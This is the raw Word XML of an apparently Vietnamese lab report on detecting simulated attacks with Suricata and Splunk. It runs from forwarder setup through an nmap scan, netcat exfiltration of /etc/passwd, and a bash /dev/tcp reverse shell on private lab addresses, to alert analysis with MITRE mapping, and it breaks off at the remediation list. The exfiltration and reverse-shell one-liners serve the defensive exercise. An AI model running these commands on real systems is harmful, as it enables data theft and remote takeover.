    <w:p w14:paraId="41975194" w14:textId="4EEF288D" w:rsidR="00E45A0B" w:rsidRPr="00E45A0B" w:rsidRDefault="00E45A0B" w:rsidP="00E45A0B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E45A0B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Lưu và khởi động lại Splunk Universal Forwarder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DBFE449" w14:textId="2581EE6D" w:rsidR="00E45A0B" w:rsidRPr="00E45A0B" w:rsidRDefault="00E45A0B" w:rsidP="00E45A0B">
      <w:r w:rsidRPr="00E45A0B">
        <w:t>sudo /opt/splunkforwarder/bin/splunk restart</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55A598BD" w14:textId="390E8A9C" w:rsidR="00E45A0B" w:rsidRPr="00E45A0B" w:rsidRDefault="00E45A0B" w:rsidP="00E45A0B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E45A0B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Xác minh chuyển tiếp log</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CE16ACB" w14:textId="369782F8" w:rsidR="00E45A0B" w:rsidRPr="00E45A0B" w:rsidRDefault="008713DD" w:rsidP="00E45A0B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6D8844D3" wp14:editId="59A8BBAA">
            <wp:extent cx="5943600" cy="3013710"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="15171148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4806" name="Picture 1517114806"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId14">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7ECAC94E" w14:textId="77777777" w:rsidR="00E45A0B" w:rsidRPr="00E45A0B" w:rsidRDefault="00E45A0B" w:rsidP="00E45A0B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E45A0B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bước 4: Mô phỏng các cuộc tấn công mạng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4499B431" w14:textId="77777777" w:rsidR="00E45A0B" w:rsidRPr="00E45A0B" w:rsidRDefault="00E45A0B" w:rsidP="00E45A0B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E45A0B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Quét cổng bằng Nmap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57A28335" w14:textId="77777777" w:rsidR="00E45A0B" w:rsidRPr="00E45A0B" w:rsidRDefault="00E45A0B" w:rsidP="00E45A0B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E45A0B">
        <w:t>Sử dụng nmap chế độ quét SYN để tìm các cổng mở trên máy nạn nhân. Hành vi này thường được sử dụng trong giai đoạn reconnaissance và có thể bị phát hiện bởi IDS là hành vi nguy hại</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10906611" w14:textId="079E2540" w:rsidR="00E45A0B" w:rsidRPr="00E45A0B" w:rsidRDefault="00E45A0B" w:rsidP="00E45A0B">
      <w:r w:rsidRPr="00E45A0B">
        <w:t>nmap -sS -T4 -p- 192.168.</w:t>
      </w:r>
      <w:r w:rsidR="008176AB">
        <w:t>56</w:t>
      </w:r>
      <w:r w:rsidRPr="00E45A0B">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="008176AB">
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="008D171E">
        <w:t>05</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA85D8A" w14:textId="03AD6BD4" w:rsidR="00E45A0B" w:rsidRPr="00E45A0B" w:rsidRDefault="006F1EEC" w:rsidP="00E45A0B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2F0E5612" wp14:editId="3BFF6D36">
            <wp:extent cx="5943600" cy="1910715"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="18214686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68676" name="Picture 1821468676"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId15">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1910715"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C1935EC" w14:textId="77777777" w:rsidR="00E45A0B" w:rsidRPr="00E45A0B" w:rsidRDefault="00E45A0B" w:rsidP="00E45A0B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E45A0B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mô phỏng trích xuất thông tin từ máy nạn nhân</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E3680D1" w14:textId="77777777" w:rsidR="00E45A0B" w:rsidRPr="00E45A0B" w:rsidRDefault="00E45A0B" w:rsidP="00E45A0B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E45A0B">
        <w:t>Mô phỏng việc mã hóa và gửi nội dung file hệ thống nhạy cảm tới kẻ tấn công thông qua netcat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BF8A2ED" w14:textId="77777777" w:rsidR="00E45A0B" w:rsidRPr="00E45A0B" w:rsidRDefault="00E45A0B" w:rsidP="00E45A0B">
      <w:r w:rsidRPr="00E45A0B">
        <w:t># On Attacker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19AA4EAB" w14:textId="3717377D" w:rsidR="00E45A0B" w:rsidRPr="00E45A0B" w:rsidRDefault="00E45A0B" w:rsidP="00E45A0B">
      <w:r w:rsidRPr="00E45A0B">
        <w:lastRenderedPageBreak/>
        <w:t>nc -lvnp 5555</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3598BE94" w14:textId="77777777" w:rsidR="00E45A0B" w:rsidRPr="00E45A0B" w:rsidRDefault="00E45A0B" w:rsidP="00E45A0B">
      <w:r w:rsidRPr="00E45A0B">
        <w:t># On Victim</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FD4000B" w14:textId="77777777" w:rsidR="00E45A0B" w:rsidRPr="00CC467F" w:rsidRDefault="00E45A0B" w:rsidP="00E45A0B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC467F">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>cat /etc/passwd | base64 | nc 192.168.100.10 5555</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1118B4BB" w14:textId="7BDA20A1" w:rsidR="00040AA7" w:rsidRPr="00C207EE" w:rsidRDefault="00040AA7" w:rsidP="00E45A0B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7A22B141" wp14:editId="1FF6F2B1">
            <wp:extent cx="5725324" cy="1886213"/>
            <wp:effectExtent l="0" t="0" r="8890" b="0"/>
            <wp:docPr id="147825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5063" name="Picture 147825063"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId16">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5725324" cy="1886213"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="43127C63" w14:textId="6DCDDA60" w:rsidR="00E45A0B" w:rsidRPr="00E45A0B" w:rsidRDefault="00B608B4" w:rsidP="00E45A0B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0D3F874B" wp14:editId="09232192">
            <wp:extent cx="5639587" cy="323895"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="5245347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4749" name="Picture 524534749"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId17">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5639587" cy="323895"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="373ACC5D" w14:textId="77777777" w:rsidR="00E45A0B" w:rsidRPr="00E45A0B" w:rsidRDefault="00E45A0B" w:rsidP="00E45A0B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E45A0B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Reverse Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65BEE2ED" w14:textId="77777777" w:rsidR="00E45A0B" w:rsidRPr="00E45A0B" w:rsidRDefault="00E45A0B" w:rsidP="00E45A0B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E45A0B">
        <w:t>Mô phỏng truyền thông của Command và Control bằng việc thiết lập kết nối reverse shell từ máy nạn nhân</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67148173" w14:textId="77777777" w:rsidR="00E45A0B" w:rsidRPr="00E45A0B" w:rsidRDefault="00E45A0B" w:rsidP="00E45A0B">
      <w:r w:rsidRPr="00E45A0B">
        <w:t># On Attacker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18B71370" w14:textId="77777777" w:rsidR="00E45A0B" w:rsidRPr="00E45A0B" w:rsidRDefault="00E45A0B" w:rsidP="006D0165">
      <w:r w:rsidRPr="00E45A0B">
        <w:t>nc -lvnp 4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4271706D" w14:textId="52699455" w:rsidR="00E45A0B" w:rsidRPr="00E45A0B" w:rsidRDefault="00B608B4" w:rsidP="00E45A0B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="376C691B" wp14:editId="10EFE533">
            <wp:extent cx="5943600" cy="2971800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1019732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2151" name="Picture 1019732151"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1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4F2DD0B" w14:textId="77777777" w:rsidR="00E45A0B" w:rsidRPr="00E45A0B" w:rsidRDefault="00E45A0B" w:rsidP="00E45A0B">
      <w:r w:rsidRPr="00E45A0B">
        <w:t># On Victim</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4416A17F" w14:textId="77777777" w:rsidR="00E45A0B" w:rsidRPr="00E45A0B" w:rsidRDefault="00E45A0B" w:rsidP="00E45A0B">
      <w:r w:rsidRPr="00E45A0B">
        <w:lastRenderedPageBreak/>
        <w:t>bash -i &gt;&amp; /dev/tcp/192.168.100.20/4444 0&gt;&amp;1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="333E6F50" w14:textId="6818D569" w:rsidR="00E45A0B" w:rsidRPr="00E45A0B" w:rsidRDefault="00B608B4" w:rsidP="00E45A0B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1BC01B2D" wp14:editId="74914075">
            <wp:extent cx="5296639" cy="238158"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="2086461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1845" name="Picture 2086461845"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId19">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5296639" cy="238158"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D41124C" w14:textId="77777777" w:rsidR="00E45A0B" w:rsidRPr="00E45A0B" w:rsidRDefault="00E45A0B" w:rsidP="00E45A0B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E45A0B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bước 5. Phân tích log trong Splunk</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="477A1768" w14:textId="77777777" w:rsidR="00E45A0B" w:rsidRPr="00E45A0B" w:rsidRDefault="00E45A0B" w:rsidP="00E45A0B">
      <w:r w:rsidRPr="00E45A0B">
        <w:t>Hệ thống IDS Suricata đã ghi nhận một cảnh báo nghiêm trọng liên quan đến hành vi có khả năng là khai thác thực thi mã từ xa (RCE). Payload có dấu hiệu mã hóa base64 và được thực thi thông qua /bin/bash, một kỹ thuật thường thấy trong các cuộc tấn công nhằm chiếm quyền điều khiển từ xa.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31E0C48D" w14:textId="77777777" w:rsidR="00E45A0B" w:rsidRPr="00E45A0B" w:rsidRDefault="00E45A0B" w:rsidP="00E45A0B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E45A0B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Chữ ký phát hiện:</w:t>
      </w:r>
      <w:r w:rsidRPr="00E45A0B">
        <w:t xml:space="preserve"> ET EXPLOIT bin bash base64 encoded Remote Code Execution 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16E131E9" w14:textId="77777777" w:rsidR="00E45A0B" w:rsidRPr="00E45A0B" w:rsidRDefault="00E45A0B" w:rsidP="00E45A0B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E45A0B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Hành động:</w:t>
      </w:r>
      <w:r w:rsidRPr="00E45A0B">
        <w:t xml:space="preserve"> allowed (gói tin được cho phép đi qua)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58448592" w14:textId="77777777" w:rsidR="00E45A0B" w:rsidRPr="00E45A0B" w:rsidRDefault="00E45A0B" w:rsidP="00E45A0B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E45A0B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Danh mục:</w:t>
      </w:r>
      <w:r w:rsidRPr="00E45A0B">
        <w:t xml:space="preserve"> Attempted User Privilege Gain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57C50848" w14:textId="77777777" w:rsidR="00E45A0B" w:rsidRPr="00E45A0B" w:rsidRDefault="00E45A0B" w:rsidP="00E45A0B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E45A0B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mức độ nghiêm trọng:</w:t>
      </w:r>
      <w:r w:rsidRPr="00E45A0B">
        <w:t xml:space="preserve"> 1 (cao nhất)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7442A4CB" w14:textId="77777777" w:rsidR="00E45A0B" w:rsidRPr="00E45A0B" w:rsidRDefault="00E45A0B" w:rsidP="006239D7">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00E45A0B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>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4285"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E45A0B" w:rsidRPr="00E45A0B" w14:paraId="31CDDE81" w14:textId="77777777" w:rsidTr="00E45A0B">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3BB8F9CE" w14:textId="77777777" w:rsidR="00E45A0B" w:rsidRPr="00E45A0B" w:rsidRDefault="00E45A0B" w:rsidP="00E45A0B">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E45A0B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Trường</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="425429A1" w14:textId="77777777" w:rsidR="00E45A0B" w:rsidRPr="00E45A0B" w:rsidRDefault="00E45A0B" w:rsidP="00E45A0B">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E45A0B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Giá trị</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E45A0B" w:rsidRPr="00E45A0B" w14:paraId="03A0C604" w14:textId="77777777" w:rsidTr="00E45A0B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="41DDCC9C" w14:textId="77777777" w:rsidR="00E45A0B" w:rsidRPr="00E45A0B" w:rsidRDefault="00E45A0B" w:rsidP="00E45A0B">
            <w:r w:rsidRPr="00E45A0B">
              <w:t>Tactic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="74FF5D07" w14:textId="77777777" w:rsidR="00E45A0B" w:rsidRPr="00E45A0B" w:rsidRDefault="00E45A0B" w:rsidP="00E45A0B">
            <w:r w:rsidRPr="00E45A0B">
              <w:t>Initial Access (TA0001)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E45A0B" w:rsidRPr="00E45A0B" w14:paraId="69683FA3" w14:textId="77777777" w:rsidTr="00E45A0B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="49D92D4B" w14:textId="77777777" w:rsidR="00E45A0B" w:rsidRPr="00E45A0B" w:rsidRDefault="00E45A0B" w:rsidP="00E45A0B">
            <w:r w:rsidRPr="00E45A0B">
              <w:t>Technique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2BAB65AC" w14:textId="77777777" w:rsidR="00E45A0B" w:rsidRPr="00E45A0B" w:rsidRDefault="00E45A0B" w:rsidP="00E45A0B">
            <w:r w:rsidRPr="00E45A0B">
              <w:t>Exploit Public-Facing Application (T1190)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E45A0B" w:rsidRPr="00E45A0B" w14:paraId="45CEBA5E" w14:textId="77777777" w:rsidTr="00E45A0B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5F5E4D58" w14:textId="77777777" w:rsidR="00E45A0B" w:rsidRPr="00E45A0B" w:rsidRDefault="00E45A0B" w:rsidP="00E45A0B">
            <w:r w:rsidRPr="00E45A0B">
              <w:t>Mục tiêu</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3FCA0FD8" w14:textId="77777777" w:rsidR="00E45A0B" w:rsidRPr="00E45A0B" w:rsidRDefault="00E45A0B" w:rsidP="00E45A0B">
            <w:r w:rsidRPr="00E45A0B">
              <w:t>Web Server</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E45A0B" w:rsidRPr="00E45A0B" w14:paraId="261444E7" w14:textId="77777777" w:rsidTr="00E45A0B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="26D08D61" w14:textId="77777777" w:rsidR="00E45A0B" w:rsidRPr="00E45A0B" w:rsidRDefault="00E45A0B" w:rsidP="00E45A0B">
            <w:r w:rsidRPr="00E45A0B">
              <w:t>Mức độ tin cậy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="29CC84ED" w14:textId="77777777" w:rsidR="00E45A0B" w:rsidRPr="00E45A0B" w:rsidRDefault="00E45A0B" w:rsidP="00E45A0B">
            <w:r w:rsidRPr="00E45A0B">
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E45A0B" w:rsidRPr="00E45A0B" w14:paraId="7F87D214" w14:textId="77777777" w:rsidTr="00E45A0B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="72A40C5C" w14:textId="77777777" w:rsidR="00E45A0B" w:rsidRPr="00E45A0B" w:rsidRDefault="00E45A0B" w:rsidP="00E45A0B">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="pt-BR"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E45A0B">
              <w:rPr>
                <w:lang w:val="pt-BR"/>
              </w:rPr>
              <w:t>Mức độ nghiêm trọng (metadata)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1A7B1957" w14:textId="77777777" w:rsidR="00E45A0B" w:rsidRPr="00E45A0B" w:rsidRDefault="00E45A0B" w:rsidP="00E45A0B">
            <w:r w:rsidRPr="00E45A0B">
              <w:t>Major</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1893414E" w14:textId="77777777" w:rsidR="00E45A0B" w:rsidRPr="00E45A0B" w:rsidRDefault="00E45A0B" w:rsidP="00E45A0B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E45A0B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Đánh giá và phân tích</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="643D0083" w14:textId="77777777" w:rsidR="00E45A0B" w:rsidRPr="00E45A0B" w:rsidRDefault="00E45A0B" w:rsidP="00E45A0B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E45A0B">
        <w:t>Cổng đích 4444 thường được sử dụng trong reverse shell hoặc payload khai thác, ví dụ như Metasploit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13497DC1" w14:textId="77777777" w:rsidR="00E45A0B" w:rsidRPr="00E45A0B" w:rsidRDefault="00E45A0B" w:rsidP="00E45A0B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E45A0B">
        <w:t>Việc sử dụng base64 kết hợp với /bin/bash cho thấy đây có thể là hành vi chạy mã độc từ xa.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="056A18A1" w14:textId="77777777" w:rsidR="00E45A0B" w:rsidRPr="00E45A0B" w:rsidRDefault="00E45A0B" w:rsidP="00E45A0B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E45A0B">
        <w:t>Cảnh báo này nằm trong nhóm kỹ thuật Ingress Tool Transfer hoặc Exploit Public-Facing Application – kỹ thuật phổ biến để xâm nhập ban đầu vào hệ thống.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="523F7EDA" w14:textId="77777777" w:rsidR="00E45A0B" w:rsidRPr="00E45A0B" w:rsidRDefault="00E45A0B" w:rsidP="00F9157C">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00E45A0B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Đề xuất xử lý</w:t>
      </w:r>
      <w:r w:rsidRPr="00E45A0B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68F24B08" w14:textId="77777777" w:rsidR="00E45A0B" w:rsidRPr="00E45A0B" w:rsidRDefault="00E45A0B" w:rsidP="00E45A0B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="29"/>
